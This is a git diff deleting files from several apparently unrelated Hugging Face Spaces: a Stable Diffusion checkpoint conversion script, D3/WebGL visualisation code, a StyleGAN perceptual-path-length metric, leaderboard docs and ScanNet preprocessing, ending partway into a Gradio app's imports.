- -import argparse -import os.path as osp -import re - -import torch -import gc - -# =================# -# UNet Conversion # -# =================# - -unet_conversion_map = [ - # (stable-diffusion, HF Diffusers) - ("time_embed.0.weight", "time_embedding.linear_1.weight"), - ("time_embed.0.bias", "time_embedding.linear_1.bias"), - ("time_embed.2.weight", "time_embedding.linear_2.weight"), - ("time_embed.2.bias", "time_embedding.linear_2.bias"), - ("input_blocks.0.0.weight", "conv_in.weight"), - ("input_blocks.0.0.bias", "conv_in.bias"), - ("out.0.weight", "conv_norm_out.weight"), - ("out.0.bias", "conv_norm_out.bias"), - ("out.2.weight", "conv_out.weight"), - ("out.2.bias", "conv_out.bias"), -] - -unet_conversion_map_resnet = [ - # (stable-diffusion, HF Diffusers) - ("in_layers.0", "norm1"), - ("in_layers.2", "conv1"), - ("out_layers.0", "norm2"), - ("out_layers.3", "conv2"), - ("emb_layers.1", "time_emb_proj"), - ("skip_connection", "conv_shortcut"), -] - -unet_conversion_map_layer = [] -# hardcoded number of downblocks and resnets/attentions... -# would need smarter logic for other networks. -for i in range(4): - # loop over downblocks/upblocks - - for j in range(2): - # loop over resnets/attentions for downblocks - hf_down_res_prefix = f"down_blocks.{i}.resnets.{j}." - sd_down_res_prefix = f"input_blocks.{3*i + j + 1}.0." - unet_conversion_map_layer.append((sd_down_res_prefix, hf_down_res_prefix)) - - if i < 3: - # no attention layers in down_blocks.3 - hf_down_atn_prefix = f"down_blocks.{i}.attentions.{j}." - sd_down_atn_prefix = f"input_blocks.{3*i + j + 1}.1." - unet_conversion_map_layer.append((sd_down_atn_prefix, hf_down_atn_prefix)) - - for j in range(3): - # loop over resnets/attentions for upblocks - hf_up_res_prefix = f"up_blocks.{i}.resnets.{j}." - sd_up_res_prefix = f"output_blocks.{3*i + j}.0." 
- unet_conversion_map_layer.append((sd_up_res_prefix, hf_up_res_prefix)) - - if i > 0: - # no attention layers in up_blocks.0 - hf_up_atn_prefix = f"up_blocks.{i}.attentions.{j}." - sd_up_atn_prefix = f"output_blocks.{3*i + j}.1." - unet_conversion_map_layer.append((sd_up_atn_prefix, hf_up_atn_prefix)) - - if i < 3: - # no downsample in down_blocks.3 - hf_downsample_prefix = f"down_blocks.{i}.downsamplers.0.conv." - sd_downsample_prefix = f"input_blocks.{3*(i+1)}.0.op." - unet_conversion_map_layer.append((sd_downsample_prefix, hf_downsample_prefix)) - - # no upsample in up_blocks.3 - hf_upsample_prefix = f"up_blocks.{i}.upsamplers.0." - sd_upsample_prefix = f"output_blocks.{3*i + 2}.{1 if i == 0 else 2}." - unet_conversion_map_layer.append((sd_upsample_prefix, hf_upsample_prefix)) - -hf_mid_atn_prefix = "mid_block.attentions.0." -sd_mid_atn_prefix = "middle_block.1." -unet_conversion_map_layer.append((sd_mid_atn_prefix, hf_mid_atn_prefix)) - -for j in range(2): - hf_mid_res_prefix = f"mid_block.resnets.{j}." - sd_mid_res_prefix = f"middle_block.{2*j}." - unet_conversion_map_layer.append((sd_mid_res_prefix, hf_mid_res_prefix)) - - -def convert_unet_state_dict(unet_state_dict): - # buyer beware: this is a *brittle* function, - # and correct output requires that all of these pieces interact in - # the exact order in which I have arranged them. 
- mapping = {k: k for k in unet_state_dict.keys()} - for sd_name, hf_name in unet_conversion_map: - mapping[hf_name] = sd_name - for k, v in mapping.items(): - if "resnets" in k: - for sd_part, hf_part in unet_conversion_map_resnet: - v = v.replace(hf_part, sd_part) - mapping[k] = v - for k, v in mapping.items(): - for sd_part, hf_part in unet_conversion_map_layer: - v = v.replace(hf_part, sd_part) - mapping[k] = v - new_state_dict = {v: unet_state_dict[k] for k, v in mapping.items()} - return new_state_dict - - -# ================# -# VAE Conversion # -# ================# - -vae_conversion_map = [ - # (stable-diffusion, HF Diffusers) - ("nin_shortcut", "conv_shortcut"), - ("norm_out", "conv_norm_out"), - ("mid.attn_1.", "mid_block.attentions.0."), -] - -for i in range(4): - # down_blocks have two resnets - for j in range(2): - hf_down_prefix = f"encoder.down_blocks.{i}.resnets.{j}." - sd_down_prefix = f"encoder.down.{i}.block.{j}." - vae_conversion_map.append((sd_down_prefix, hf_down_prefix)) - - if i < 3: - hf_downsample_prefix = f"down_blocks.{i}.downsamplers.0." - sd_downsample_prefix = f"down.{i}.downsample." - vae_conversion_map.append((sd_downsample_prefix, hf_downsample_prefix)) - - hf_upsample_prefix = f"up_blocks.{i}.upsamplers.0." - sd_upsample_prefix = f"up.{3-i}.upsample." - vae_conversion_map.append((sd_upsample_prefix, hf_upsample_prefix)) - - # up_blocks have three resnets - # also, up blocks in hf are numbered in reverse from sd - for j in range(3): - hf_up_prefix = f"decoder.up_blocks.{i}.resnets.{j}." - sd_up_prefix = f"decoder.up.{3-i}.block.{j}." - vae_conversion_map.append((sd_up_prefix, hf_up_prefix)) - -# this part accounts for mid blocks in both the encoder and the decoder -for i in range(2): - hf_mid_res_prefix = f"mid_block.resnets.{i}." - sd_mid_res_prefix = f"mid.block_{i+1}." 
- vae_conversion_map.append((sd_mid_res_prefix, hf_mid_res_prefix)) - - -vae_conversion_map_attn = [ - # (stable-diffusion, HF Diffusers) - ("norm.", "group_norm."), - ("q.", "query."), - ("k.", "key."), - ("v.", "value."), - ("proj_out.", "proj_attn."), -] - - -def reshape_weight_for_sd(w): - # convert HF linear weights to SD conv2d weights - return w.reshape(*w.shape, 1, 1) - - -def convert_vae_state_dict(vae_state_dict): - mapping = {k: k for k in vae_state_dict.keys()} - for k, v in mapping.items(): - for sd_part, hf_part in vae_conversion_map: - v = v.replace(hf_part, sd_part) - mapping[k] = v - for k, v in mapping.items(): - if "attentions" in k: - for sd_part, hf_part in vae_conversion_map_attn: - v = v.replace(hf_part, sd_part) - mapping[k] = v - new_state_dict = {v: vae_state_dict[k] for k, v in mapping.items()} - weights_to_convert = ["q", "k", "v", "proj_out"] - print("Converting to CKPT ...") - for k, v in new_state_dict.items(): - for weight_name in weights_to_convert: - if f"mid.attn_1.{weight_name}.weight" in k: - print(f"Reshaping {k} for SD format") - new_state_dict[k] = reshape_weight_for_sd(v) - return new_state_dict - - -# =========================# -# Text Encoder Conversion # -# =========================# - - -textenc_conversion_lst = [ - # (stable-diffusion, HF Diffusers) - ("resblocks.", "text_model.encoder.layers."), - ("ln_1", "layer_norm1"), - ("ln_2", "layer_norm2"), - (".c_fc.", ".fc1."), - (".c_proj.", ".fc2."), - (".attn", ".self_attn"), - ("ln_final.", "transformer.text_model.final_layer_norm."), - ("token_embedding.weight", "transformer.text_model.embeddings.token_embedding.weight"), - ("positional_embedding", "transformer.text_model.embeddings.position_embedding.weight"), -] -protected = {re.escape(x[1]): x[0] for x in textenc_conversion_lst} -textenc_pattern = re.compile("|".join(protected.keys())) - -# Ordering is from https://github.com/pytorch/pytorch/blob/master/test/cpp/api/modules.cpp -code2idx = {"q": 0, "k": 1, "v": 2} - - 
-def convert_text_enc_state_dict_v20(text_enc_dict): - new_state_dict = {} - capture_qkv_weight = {} - capture_qkv_bias = {} - for k, v in text_enc_dict.items(): - if ( - k.endswith(".self_attn.q_proj.weight") - or k.endswith(".self_attn.k_proj.weight") - or k.endswith(".self_attn.v_proj.weight") - ): - k_pre = k[: -len(".q_proj.weight")] - k_code = k[-len("q_proj.weight")] - if k_pre not in capture_qkv_weight: - capture_qkv_weight[k_pre] = [None, None, None] - capture_qkv_weight[k_pre][code2idx[k_code]] = v - continue - - if ( - k.endswith(".self_attn.q_proj.bias") - or k.endswith(".self_attn.k_proj.bias") - or k.endswith(".self_attn.v_proj.bias") - ): - k_pre = k[: -len(".q_proj.bias")] - k_code = k[-len("q_proj.bias")] - if k_pre not in capture_qkv_bias: - capture_qkv_bias[k_pre] = [None, None, None] - capture_qkv_bias[k_pre][code2idx[k_code]] = v - continue - - relabelled_key = textenc_pattern.sub(lambda m: protected[re.escape(m.group(0))], k) - new_state_dict[relabelled_key] = v - - for k_pre, tensors in capture_qkv_weight.items(): - if None in tensors: - raise Exception("CORRUPTED MODEL: one of the q-k-v values for the text encoder was missing") - relabelled_key = textenc_pattern.sub(lambda m: protected[re.escape(m.group(0))], k_pre) - new_state_dict[relabelled_key + ".in_proj_weight"] = torch.cat(tensors) - - for k_pre, tensors in capture_qkv_bias.items(): - if None in tensors: - raise Exception("CORRUPTED MODEL: one of the q-k-v values for the text encoder was missing") - relabelled_key = textenc_pattern.sub(lambda m: protected[re.escape(m.group(0))], k_pre) - new_state_dict[relabelled_key + ".in_proj_bias"] = torch.cat(tensors) - - return new_state_dict - - -def convert_text_enc_state_dict(text_enc_dict): - return text_enc_dict - - -def convert(model_path, checkpoint_path): - unet_path = osp.join(model_path, "unet", "diffusion_pytorch_model.bin") - vae_path = osp.join(model_path, "vae", "diffusion_pytorch_model.bin") - text_enc_path = osp.join(model_path, 
"text_encoder", "pytorch_model.bin") - - # Convert the UNet model - unet_state_dict = torch.load(unet_path, map_location="cpu") - unet_state_dict = convert_unet_state_dict(unet_state_dict) - unet_state_dict = {"model.diffusion_model." + k: v for k, v in unet_state_dict.items()} - - # Convert the VAE model - vae_state_dict = torch.load(vae_path, map_location="cpu") - vae_state_dict = convert_vae_state_dict(vae_state_dict) - vae_state_dict = {"first_stage_model." + k: v for k, v in vae_state_dict.items()} - - # Convert the text encoder model - text_enc_dict = torch.load(text_enc_path, map_location="cpu") - - # Easiest way to identify v2.0 model seems to be that the text encoder (OpenCLIP) is deeper - is_v20_model = "text_model.encoder.layers.22.layer_norm2.bias" in text_enc_dict - - if is_v20_model: - # Need to add the tag 'transformer' in advance so we can knock it out from the final layer-norm - text_enc_dict = {"transformer." + k: v for k, v in text_enc_dict.items()} - text_enc_dict = convert_text_enc_state_dict_v20(text_enc_dict) - text_enc_dict = {"cond_stage_model.model." + k: v for k, v in text_enc_dict.items()} - else: - text_enc_dict = convert_text_enc_state_dict(text_enc_dict) - text_enc_dict = {"cond_stage_model.transformer." 
+ k: v for k, v in text_enc_dict.items()} - - # Put together new checkpoint - state_dict = {**unet_state_dict, **vae_state_dict, **text_enc_dict} - state_dict = {k: v.half() for k, v in state_dict.items()} - state_dict = {"state_dict": state_dict} - torch.save(state_dict, checkpoint_path) - del state_dict, text_enc_dict, vae_state_dict, unet_state_dict - torch.cuda.empty_cache() - gc.collect() - \ No newline at end of file diff --git a/spaces/merve/fill-in-the-blank/source/uncertainty-calibration/footnote.js b/spaces/merve/fill-in-the-blank/source/uncertainty-calibration/footnote.js deleted file mode 100644 index 05eac09cc1b8466bb2c440b6fd23060cd91f5017..0000000000000000000000000000000000000000 --- a/spaces/merve/fill-in-the-blank/source/uncertainty-calibration/footnote.js +++ /dev/null @@ -1,73 +0,0 @@ -!(() => { - var ttFnSel = d3.select('body').selectAppend('div.tooltip-footnote.tooltip-footnote-hidden') - - function index2superscipt(i){ - return (i + 1 + '') - .split('') - .map(num => '⁰¹²³⁴⁵⁶⁷⁸⁹'[num]) - .join('') - } - - var footendSel = d3.selectAll('.footend') - .each(function(d, i){ - var sel = d3.select(this) - var ogHTML = sel.parent().html() - - sel - .at({href: '#footstart-' + i, id: 'footend-' + i}) - .text(index2superscipt(i)) - .datum(ogHTML) - }) - - footendSel.parent().parent().selectAll('br').remove() - - var footstartSel = d3.selectAll('.footstart') - .each(function(d, i){ - d3.select(this) - .at({ - href: '#footend-' + i, - }) - .text(index2superscipt(i)) - .datum(footendSel.data()[i]) - .parent().at({id: 'footstart-' + i}) - }) - .call(addLockedTooltip) - - - function addLockedTooltip(sel){ - sel - .on('mouseover', function(d, i){ - ttFnSel - .classed('tooltip-footnote-hidden', 0) - .html(d).select('.footend').remove() - - var [x, y] = d3.mouse(d3.select('html').node()) - var bb = ttFnSel.node().getBoundingClientRect(), - left = d3.clamp(20, (x-bb.width/2), window.innerWidth - bb.width - 20), - top = innerHeight + scrollY > y + 20 + bb.height 
? y + 20 : y - bb.height - 10; - - ttFnSel.st({left, top}) - }) - .on('mousemove', mousemove) - .on('mouseout', mouseout) - - ttFnSel - .on('mousemove', mousemove) - .on('mouseout', mouseout) - - function mousemove(){ - if (window.__ttfade) window.__ttfade.stop() - } - - function mouseout(){ - if (window.__ttfade) window.__ttfade.stop() - window.__ttfade = d3.timeout( - () => ttFnSel.classed('tooltip-footnote-hidden', 1), - 250 - ) - } - } - -})() - - diff --git a/spaces/merve/hidden-bias/public/fill-in-the-blank/scatter.js b/spaces/merve/hidden-bias/public/fill-in-the-blank/scatter.js deleted file mode 100644 index f0656aaaf3fdbea7ab8c3f6e87d9f9a864ad6726..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/public/fill-in-the-blank/scatter.js +++ /dev/null @@ -1,232 +0,0 @@ -/* Copyright 2021 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. 
-==============================================================================*/ - - -window.initScatter = function(c){ - var rv = {data: [], cur_t: 0} - - var duration = 1 - if (!c.scatters) c.scatters = [rv] - - var [svgbot, ctx, divSel, svg] = c.layers - - var regl = createREGL({ - container: divSel.node(), - // attributes: {antialias: false}, - }) - - - // https://blocks.roadtolarissa.com/1wheel/0a58f8bf5a14f6a534b9043a9c63dd1d - // https://peterbeshai.com/blog/2017-05-26-beautifully-animate-points-with-webgl-and-regl/ - function drawRegl(){ - var {data} = rv - var t0 = performance.now() - - var tmpData = [ - {x: 0, y: 0}, - {x: .5, y: .5}, - {x: 1, y: 1}, - {x: -1, y: -1}, - ] - - var drawPoints = regl({ - vert: ` - precision mediump float; - attribute float x, y, px, py, isVisible; - - attribute vec3 color; - varying vec3 fragColor; - - uniform float interp; - void main() { - float xPos = isVisible < .5 ? -2.0 : mix(px, x, interp); - // float xPos = mix(px, x, interp); - float yPos = mix(py, y, interp); - gl_Position = vec4(xPos, yPos, 0, 1); - - gl_PointSize = ${devicePixelRatio > 3 ? 7 : devicePixelRatio > 1 ? 5 : 2}.0; - - fragColor = color; - }`, - frag: ` - precision mediump float; - varying vec3 fragColor; - void main() { - gl_FragColor = vec4(fragColor, 1.0); - }`, - - - attributes: { - x: data.map(d => d.x/c.width*2 - 1), - y: data.map(d => -d.y/c.height*2 + 1), - px: data.map(d => d.p.x/c.width*2 - 1), - py: data.map(d => -d.p.y/c.height*2 + 1), - color: data.map(d => d.color), - isVisible: data.map(d => c.type != 'c' || d.isVisible ? 
1 : 0), - }, - uniforms: { - interp: (ctx, props) => props.interp, - }, - primitive: 'point', - count: data.length, - }) - - drawPoints({interp: 0}) - - if (rv.regltick) rv.regltick.cancel() - rv.regltick = regl.frame(({ time }) => { - var dt = performance.now() - t0 + 8 - var interp = d3.easeCubic(d3.clamp(0, dt/duration, 1)) - - drawPoints({interp}) - if (1 == interp && rv.regltick) rv.regltick.cancel() - - // c.svg.selectAppend('text.debug').text(dt + ' ' + interp) - }) - } - - var centerPathSel = c.svg.selectAppend('path.center') - .st({pointerEvents: 'none', strokeWidth: .3, stroke: '#ccc'}) - - rv.draw = function(c, data, isxy){ - rv.pData = rv.data - rv.data = data - - if (!rv.pData.length) rv.pData = rv.data - - data.forEach((d, i) => { - d.prettyWord = d.word.replace('▁', '') - d.color = util.color2array(d.fill) - // console.log(d.color) - d.i = i - d.p = rv.pData[i] - if (!d.p) debugger - // ctx.fillStyle = d.fill - // ctx.fillRect(d.x - d.s/2, d.y - d.s/2, d.s, d.s) - }) - - - - var tinyTextSel = svg.selectAll('text.tiny') - .data(data.filter(d => d.show), d => d.word) - - tinyTextSel.exit() - .transition().duration(duration) - .translate(d => [rv.data[d.i].x, rv.data[d.i].y]) - .at({fill: d => d.fill, opacity: 0}) - .remove() - - tinyTextSel.enter().append('text.tiny') - .text(d => d.prettyWord) - .at({ - dy: d => d.show[0] == 'u' ? -2 : 10, - dx: d => d.show[1] == 'r' ? 2 : -2, - textAnchor: d => d.show[1] == 'r' ? '' : 'end', - fill: d => d.p.fill, - opacity: 0 - }) - .translate(d => [d.p.x, d.p.y]) - .merge(tinyTextSel) - .transition().duration(duration) - .translate(d => [d.x, d.y]) - .at({fill: d => d.fill, opacity: 1}) - - c.svg.transition().duration(duration) - .attrTween('cur_t', function(){ - rv.cur_t = 0 - drawRegl() - - return t => { - rv.cur_t = t - } - }) - - centerPathSel - .raise() - .transition().duration(duration)//.ease(d3.easeQuadIn) - .at({d: isxy ? 
- ['M', 0, c.height, 'L', c.width, 0].join(' ') : - ['M', 0, c.y(0) + .5, 'L', c.width, c.y(0) + .5].join(' ') - }) - - setTimeout(() => duration = c.scatters.length > 1 ? 600 : 600, 1) - - // svg.appendMany('text.tiny', data.filter(d => d.show)) - // .text(d => d.prettyWord) - // .translate(d => [d.x, d.y]) - // .at({ - // dy: d => d.show[0] == 'u' ? -2 : 10, - // dx: d => d.show[1] == 'r' ? 2 : -2, - // textAnchor: d => d.show[1] == 'r' ? '' : 'end', - // fill: d => d.fill, - // }) - } - - function addHover(){ - var curHover = '' - var hoverSel = svg.append('g.hover').st({opacity: 0, pointerEvents: 'none'}) - - hoverSel.append('circle') - .at({r: 5, fill: 'none', stroke: '#000'}) - - var hoverTextSel = hoverSel.appendMany('text', [0, 1]) - .at({x: 10, y: 5, stroke: d => d ? '' : '#000'}) - .st({fontFamily: 'monospace'}) - - svg.append('rect') - .at({width: c.width, height: c.height, fill: 'rgba(0,0,0,0)'}) - - svg - .on('mousemove', function(){ - var [x, y] = d3.mouse(this) - - var match = _.minBy(rv.data.filter(d => d.isVisible), d => { - var dx = x - d.x - var dy = y - d.y - - return dx*dx + dy*dy - }) - - if (match && curHover != match.word) setHoverAll(match.word) - }) - .on('mouseout', function(){ - curHover = null - setHoverAll(null) - }) - - function setHoverAll(word){ - c.scatters.forEach(d => d.setHover(word)) - } - - rv.setHover = word => { - var d = _.find(rv.data, {word}) - if (!d){ - hoverSel.st({opacity: 0}) - hoverTextSel.text('') - return - } - curHover = word - - hoverSel.translate([d.x, d.y]).raise().st({opacity: 1}) - hoverTextSel.text(d.prettyWord) - } - } - addHover() - - return rv -} - - -if (window.init) init() diff --git a/spaces/merve/hidden-bias/public/measuring-fairness/gs.js b/spaces/merve/hidden-bias/public/measuring-fairness/gs.js deleted file mode 100644 index f3f72c87ecdb3e28fb4f4d198d70900b431151c2..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/public/measuring-fairness/gs.js +++ /dev/null @@ -1,106 +0,0 
@@ -/* Copyright 2020 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - - - -window.makeGS = function(){ - var gs = {} - - var bodySel = d3.select('body') - - var prevSlideIndex = -1 - function updateSlide(i){ - var slide = slides[i] - if (!slide) return - - gs.prevSlide = gs.curSlide - gs.curSlide = slide - - var dur = gs.prevSlide ? 500*1 : 0 - - sel.personSel.transition().duration(dur) - .translate(d => d.pos[slide.pos]) - - sel.textSel.transition().duration(dur) - .at({fill: slide.textFill}) - - - sel.rectSel.transition('opacity').duration(dur) - .at({opacity: slide.rectOpacity}) - - if (!slide.animateThreshold){ - sel.rectSel.transition('fill').duration(dur) - .at({fill: slide.rectFill}) - - sel.textSel.transition('stroke').duration(dur) - .st({strokeWidth: slide.textStroke}) - - slider.setSlider(slide.threshold, true) - bodySel.transition('gs-tween') - } else { - sel.rectSel.transition('fill').duration(dur) - sel.textSel.transition('stroke').duration(dur) - - bodySel.transition('gs-tween').duration(dur*2) - .attrTween('gs-tween', () => { - var i = d3.interpolate(slider.threshold, slide.threshold) - - return t => { - slider.setSlider(i(t)) - } - }) - } - - - sel.truthAxis.transition().duration(dur) - .st({opacity: slide.truthAxisOpacity}) - - sel.mlAxis.transition().duration(dur) - .st({opacity: slide.mlAxisOpacity}) - - sel.fpAxis.transition().duration(dur) - 
.st({opacity: slide.fpAxisOpacity}) - - sel.sexAxis.transition().duration(dur) - .st({opacity: slide.sexAxisOpacity}) - - sel.brAxis.transition().duration(dur) - .st({opacity: slide.brAxisOpacity}) - - sel.botAxis.transition().duration(dur) - .translate(slide.botAxisY, 1) - - - prevSlideIndex = i - slides.curSlide = slide - } - - gs.graphScroll = d3.graphScroll() - .container(d3.select('.container-1')) - .graph(d3.selectAll('container-1 #graph')) - .eventId('uniqueId1') - .sections(d3.selectAll('.container-1 #sections > div')) - .offset(innerWidth < 900 ? 300 : 520) - .on('active', updateSlide) - - return gs -} - - - - - -if (window.init) window.init() diff --git a/spaces/mfrashad/ClothingGAN/models/stylegan/stylegan_tf/metrics/perceptual_path_length.py b/spaces/mfrashad/ClothingGAN/models/stylegan/stylegan_tf/metrics/perceptual_path_length.py deleted file mode 100644 index 17271cfdf1545a26ab71d309ce2180532f513bd6..0000000000000000000000000000000000000000 --- a/spaces/mfrashad/ClothingGAN/models/stylegan/stylegan_tf/metrics/perceptual_path_length.py +++ /dev/null @@ -1,108 +0,0 @@ -# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. -# -# This work is licensed under the Creative Commons Attribution-NonCommercial -# 4.0 International License. To view a copy of this license, visit -# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to -# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. - -"""Perceptual Path Length (PPL).""" - -import numpy as np -import tensorflow as tf -import dnnlib.tflib as tflib - -from metrics import metric_base -from training import misc - -#---------------------------------------------------------------------------- - -# Normalize batch of vectors. -def normalize(v): - return v / tf.sqrt(tf.reduce_sum(tf.square(v), axis=-1, keepdims=True)) - -# Spherical interpolation of a batch of vectors. 
-def slerp(a, b, t): - a = normalize(a) - b = normalize(b) - d = tf.reduce_sum(a * b, axis=-1, keepdims=True) - p = t * tf.math.acos(d) - c = normalize(b - d * a) - d = a * tf.math.cos(p) + c * tf.math.sin(p) - return normalize(d) - -#---------------------------------------------------------------------------- - -class PPL(metric_base.MetricBase): - def __init__(self, num_samples, epsilon, space, sampling, minibatch_per_gpu, **kwargs): - assert space in ['z', 'w'] - assert sampling in ['full', 'end'] - super().__init__(**kwargs) - self.num_samples = num_samples - self.epsilon = epsilon - self.space = space - self.sampling = sampling - self.minibatch_per_gpu = minibatch_per_gpu - - def _evaluate(self, Gs, num_gpus): - minibatch_size = num_gpus * self.minibatch_per_gpu - - # Construct TensorFlow graph. - distance_expr = [] - for gpu_idx in range(num_gpus): - with tf.device('/gpu:%d' % gpu_idx): - Gs_clone = Gs.clone() - noise_vars = [var for name, var in Gs_clone.components.synthesis.vars.items() if name.startswith('noise')] - - # Generate random latents and interpolation t-values. - lat_t01 = tf.random_normal([self.minibatch_per_gpu * 2] + Gs_clone.input_shape[1:]) - lerp_t = tf.random_uniform([self.minibatch_per_gpu], 0.0, 1.0 if self.sampling == 'full' else 0.0) - - # Interpolate in W or Z. 
- if self.space == 'w': - dlat_t01 = Gs_clone.components.mapping.get_output_for(lat_t01, None, is_validation=True) - dlat_t0, dlat_t1 = dlat_t01[0::2], dlat_t01[1::2] - dlat_e0 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis]) - dlat_e1 = tflib.lerp(dlat_t0, dlat_t1, lerp_t[:, np.newaxis, np.newaxis] + self.epsilon) - dlat_e01 = tf.reshape(tf.stack([dlat_e0, dlat_e1], axis=1), dlat_t01.shape) - else: # space == 'z' - lat_t0, lat_t1 = lat_t01[0::2], lat_t01[1::2] - lat_e0 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis]) - lat_e1 = slerp(lat_t0, lat_t1, lerp_t[:, np.newaxis] + self.epsilon) - lat_e01 = tf.reshape(tf.stack([lat_e0, lat_e1], axis=1), lat_t01.shape) - dlat_e01 = Gs_clone.components.mapping.get_output_for(lat_e01, None, is_validation=True) - - # Synthesize images. - with tf.control_dependencies([var.initializer for var in noise_vars]): # use same noise inputs for the entire minibatch - images = Gs_clone.components.synthesis.get_output_for(dlat_e01, is_validation=True, randomize_noise=False) - - # Crop only the face region. - c = int(images.shape[2] // 8) - images = images[:, :, c*3 : c*7, c*2 : c*6] - - # Downsample image to 256x256 if it's larger than that. VGG was built for 224x224 images. - if images.shape[2] > 256: - factor = images.shape[2] // 256 - images = tf.reshape(images, [-1, images.shape[1], images.shape[2] // factor, factor, images.shape[3] // factor, factor]) - images = tf.reduce_mean(images, axis=[3,5]) - - # Scale dynamic range from [-1,1] to [0,255] for VGG. - images = (images + 1) * (255 / 2) - - # Evaluate perceptual distance. - img_e0, img_e1 = images[0::2], images[1::2] - distance_measure = misc.load_pkl('https://drive.google.com/uc?id=1N2-m9qszOeVC9Tq77WxsLnuWwOedQiD2') # vgg16_zhang_perceptual.pkl - distance_expr.append(distance_measure.get_output_for(img_e0, img_e1) * (1 / self.epsilon**2)) - - # Sampling loop. 
- all_distances = [] - for _ in range(0, self.num_samples, minibatch_size): - all_distances += tflib.run(distance_expr) - all_distances = np.concatenate(all_distances, axis=0) - - # Reject outliers. - lo = np.percentile(all_distances, 1, interpolation='lower') - hi = np.percentile(all_distances, 99, interpolation='higher') - filtered_distances = np.extract(np.logical_and(lo <= all_distances, all_distances <= hi), all_distances) - self._report_result(np.mean(filtered_distances)) - -#---------------------------------------------------------------------------- diff --git a/spaces/ml-energy/leaderboard/docs/colosseum_bottom.md b/spaces/ml-energy/leaderboard/docs/colosseum_bottom.md deleted file mode 100644 index 74992ef4e140a34f47a1f6b6e911a39d67effb48..0000000000000000000000000000000000000000 --- a/spaces/ml-energy/leaderboard/docs/colosseum_bottom.md +++ /dev/null @@ -1,11 +0,0 @@ -### Technical details - -- We allow models to generate only up to 512 new tokens. Due to this, some responses may be cut off in the middle. -- Tokens are sampled from the model output with `temperature` 1.0, `repetition_penalty` 1.0, `top_k` 50, and `top_p` 0.95. -- Large models (>= 30B) run on two NVIDIA A40 GPUs with tensor parallelism, whereas other models run on one NVIDIA A40 GPU. We directly measure the energy consumption of these GPUs. - -### Contact - -Please direct general questions and issues related to the Colosseum to our GitHub repository's [discussion board](https://github.com/ml-energy/leaderboard/discussions). -You can find the ML.ENERGY initiative members in [our homepage](https://ml.energy#members). -If you need direct communication, please email admins@ml.energy. 
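The token-sampling settings listed in the technical details above (`temperature` 1.0, `top_k` 50, `top_p` 0.95) can be sketched with a minimal, self-contained implementation of top-k plus nucleus (top-p) filtering. This is an illustrative sketch of the standard technique, not the leaderboard's actual serving code; the function name and toy logits are made up for the example.

```python
import math

def filter_candidates(logits, top_k=50, top_p=0.95):
    """Return the token indices a sampler may draw from after applying
    top-k and nucleus (top-p) filtering. Illustrative sketch only."""
    # Sort token indices by logit, highest first, and apply the top-k cut.
    order = sorted(range(len(logits)), key=lambda i: -logits[i])[:top_k]
    # Softmax over the surviving logits (shift by the max for stability).
    m = max(logits[i] for i in order)
    exps = [math.exp(logits[i] - m) for i in order]
    total = sum(exps)
    # Nucleus cut: keep the smallest prefix whose probability mass
    # reaches top_p (always keeping at least one token).
    kept, mass = [], 0.0
    for idx, e in zip(order, exps):
        kept.append(idx)
        mass += e / total
        if mass >= top_p:
            break
    return kept

# A peaked distribution: the top token alone already exceeds top_p,
# so the nucleus collapses to a single candidate.
print(filter_candidates([5.0, 1.0, 0.5, 0.1], top_k=2, top_p=0.9))  # [0]
```

In practice these cuts run on the full vocabulary logits at every decoding step before sampling; with `temperature` 1.0 and `repetition_penalty` 1.0 the logits are otherwise unmodified.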
diff --git a/spaces/mmlab-ntu/Segment-Any-RGBD/datasets/scannet_preprocess/scannet_pair/generage_list.py b/spaces/mmlab-ntu/Segment-Any-RGBD/datasets/scannet_preprocess/scannet_pair/generage_list.py deleted file mode 100644 index 8faf9feb74b68123bd363e08f7603bc7ad12c8b7..0000000000000000000000000000000000000000 --- a/spaces/mmlab-ntu/Segment-Any-RGBD/datasets/scannet_preprocess/scannet_pair/generage_list.py +++ /dev/null @@ -1,31 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import argparse -import glob, os, sys - -from SensorData import SensorData - -# params -parser = argparse.ArgumentParser() -# data paths -parser.add_argument('--target_dir', required=True, help='path to the target dir') - -opt = parser.parse_args() -print(opt) - -def main(): - overlaps = glob.glob(os.path.join(opt.target_dir, "*/pcd/overlap.txt")) - with open(os.path.join(opt.target_dir, 'overlap30.txt'), 'w') as f: - for fo in overlaps: - for line in open(fo): - pcd0, pcd1, op = line.strip().split() - if float(op) >= 0.3: - print('{} {} {}'.format(pcd0, pcd1, op), file=f) - print('done') - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/spaces/mmlab-ntu/relate-anything-model/app.py b/spaces/mmlab-ntu/relate-anything-model/app.py deleted file mode 100644 index fc6af792914297f87735bf13fef51487e8bc09fe..0000000000000000000000000000000000000000 --- a/spaces/mmlab-ntu/relate-anything-model/app.py +++ /dev/null @@ -1,313 +0,0 @@ -import sys -sys.path.append('.') - -from segment_anything import build_sam, SamPredictor, SamAutomaticMaskGenerator -import numpy as np -import gradio as gr -from PIL import Image, ImageDraw, ImageFont -from utils import iou, sort_and_deduplicate, relation_classes, MLP, show_anns, show_mask -import torch - -from ram_train_eval import RamModel,RamPredictor -from mmengine.config import Config - 
